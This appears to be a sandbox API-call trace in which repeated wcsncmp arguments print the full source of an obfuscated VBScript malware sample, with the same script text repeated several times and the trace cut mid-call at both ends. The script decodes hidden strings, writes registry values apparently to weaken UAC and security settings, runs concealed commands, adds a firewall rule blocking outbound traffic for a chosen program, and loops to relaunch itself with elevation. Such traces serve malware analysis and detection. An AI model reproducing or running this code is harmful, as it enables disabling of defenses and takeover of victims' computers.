NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 98 [0226.290] wcsncmp (_String1="n bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 97 [0226.290] wcsncmp (_String1=" bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.290] wcsncmp (_String1="bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 85 [0226.290] wcsncmp (_String1="mw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite 